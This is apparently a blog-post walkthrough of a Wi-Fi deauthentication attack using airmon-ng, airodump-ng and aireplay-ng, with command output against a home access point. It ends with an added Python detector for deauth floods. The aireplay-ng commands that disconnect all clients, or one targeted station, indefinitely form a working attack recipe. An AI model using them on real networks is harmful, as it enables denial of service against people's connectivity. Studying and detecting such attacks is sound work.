Deauthentication Attack Gist

Jan 14, 2024

This post is the gist of my writeup about the Deauthentication Attack on the Hacker Realm of Sudorealm.

Check Wireless Card Connection

root@kali:~# ifconfig wlan0

wlan0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        ether fa:30:3e:ca:dd:85  txqueuelen 1000  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
root@kali:~# iwconfig wlan0

wlan0     IEEE 802.11  ESSID:off/any  
          Mode:Managed  Access Point: Not-Associated   Tx-Power=off   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off

Set Card on Monitor Mode

root@kali:~# airmon-ng start wlan0

Found 3 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to run 'airmon-ng check kill'

  PID Name
  448 NetworkManager
  525 dhclient
  654 wpa_supplicant

PHY	Interface	Driver		Chipset

phy0	wlan0		ath9k_htc	Atheros Communications, Inc. TP-Link TL-WN322G v3 / TL-WN422G v2 802.11g [Atheros AR9271]

		(mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
		(mac80211 station mode vif disabled for [phy0]wlan0)

root@kali:~# iwconfig wlan0mon

wlan0mon  IEEE 802.11
          Mode:Monitor  Frequency:2.457 GHz  Tx-Power=20 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:off

Monitoring Results:

CH 12 ][ Elapsed: 6 s ][ 2020-09-02 15:41                                         
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

50:C7:BF:DC:4C:E8  -45   18         0      0    11  270  WPA2 CCMP   PSK  TP-LINK_AP_4CE8

Specific targeting for Better Result

airodump-ng -d 50:C7:BF:DC:4C:E8 -c 11 wlan0mon

Now we are monitoring SPECIFICALLY our target and not all nearby access points. Also, we can see that there are two devices currently inside the network, one of which is my phone!

CH 11 ][ Elapsed: 1 min ][ 2020-09-02 15:59 ]                        
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 50:C7:BF:DC:4C:E8  -22  91      610      163    4  11  270  WPA2 CCMP   PSK  TP-LINK_AP_4CE8            
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                               
 50:C7:BF:DC:4C:E8  AC:3C:0B:36:BD:5B  -32    0e-24      0       12                                       
 50:C7:BF:DC:4C:E8  E0:B5:2D:EA:18:A7  -58    1e-24      6      122  

Deauthenticating device from network //Kicking

aireplay-ng -0 0 -a 50:C7:BF:DC:4C:E8 wlan0mon

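The command above takes down the entire network: with no client address given, every device on the access point is deauthenticated.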

aireplay-ng -0 0 -a 50:C7:BF:DC:4C:E8 -c E0:B5:2D:EA:18:A7 wlan0mon

The command above kicks one specific device (the station MAC passed with -c) from the network, more efficient IMHO. 🤷‍♂️

-0 0: Deauths forever | -0 10: Sends 10 deauth packets
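Seen from the monitoring side, both commands above produce a burst of 802.11 deauthentication frames for a single (BSSID, destination) pair, and that burst is what a wireless IDS keys on. The Python below is an added example, not part of the original gist: it parses raw 802.11 frames (MAC header onward, no radiotap header) and flags pairs whose deauth rate crosses a threshold. The window, the threshold and the sample frames are constructed assumptions.

```python
import struct
from collections import defaultdict, deque

DEAUTH_FC0 = 0xC0  # frame control byte 0: version 0, type 0 (management), subtype 12 (deauth)
BROADCAST = "ff:ff:ff:ff:ff:ff"  # destination seen when a whole BSS is deauthenticated

def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)

def parse_deauth(frame):
    """Parse an 802.11 frame (MAC header onward, no radiotap header, no FCS).
    Returns (dest, src, bssid, reason) for a deauthentication frame, else None."""
    if len(frame) < 26 or frame[0] != DEAUTH_FC0:
        return None
    (reason,) = struct.unpack_from("<H", frame, 24)  # reason code follows the 24-byte header
    return mac_str(frame[4:10]), mac_str(frame[10:16]), mac_str(frame[16:22]), reason

def detect_floods(capture, window=1.0, threshold=10):
    """capture: time-ordered (timestamp_seconds, frame_bytes) pairs.
    Returns {(bssid, dest): peak deauth count inside one window} for pairs reaching threshold.
    Rate-based on purpose: spoofed frames carry the AP's MAC, so the source field proves nothing."""
    recent = defaultdict(deque)
    alerts = {}
    for ts, frame in capture:
        parsed = parse_deauth(frame)
        if parsed is None:
            continue
        dest, _src, bssid, _reason = parsed
        times = recent[(bssid, dest)]
        times.append(ts)
        while times[0] < ts - window:  # drop timestamps that left the sliding window
            times.popleft()
        if len(times) >= threshold:
            alerts[(bssid, dest)] = max(alerts.get((bssid, dest), 0), len(times))
    return alerts

def make_frame(fc0, dest, src, bssid, reason=7):
    """Build a constructed test frame (not captured traffic)."""
    raw = lambda m: bytes.fromhex(m.replace(":", ""))
    return bytes([fc0, 0, 0, 0]) + raw(dest) + raw(src) + raw(bssid) + b"\x00\x00" + struct.pack("<H", reason)

# MAC addresses reused from the airodump-ng output above; timings and frames are constructed.
AP, STA_A, STA_B = "50:c7:bf:dc:4c:e8", "e0:b5:2d:ea:18:a7", "ac:3c:0b:36:bd:5b"
SAMPLE = [(i * 0.02, make_frame(0xC0, STA_A, AP, AP)) for i in range(30)]  # burst at one station
SAMPLE += [(5.0, make_frame(0xC0, STA_B, AP, AP, reason=3)),               # single ordinary deauth
           (5.1, make_frame(0x80, BROADCAST, AP, AP))]                     # beacon, ignored

if __name__ == "__main__":
    for (bssid, dest), peak in detect_floods(SAMPLE).items():
        scope = "all clients" if dest == BROADCAST else dest
        print(f"deauth flood: bssid={bssid} target={scope} peak={peak} frames/window")
```
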

🎉Happy hacking my friends!🥂


🔥🔥🔥 FIRE 🔥🔥🔥

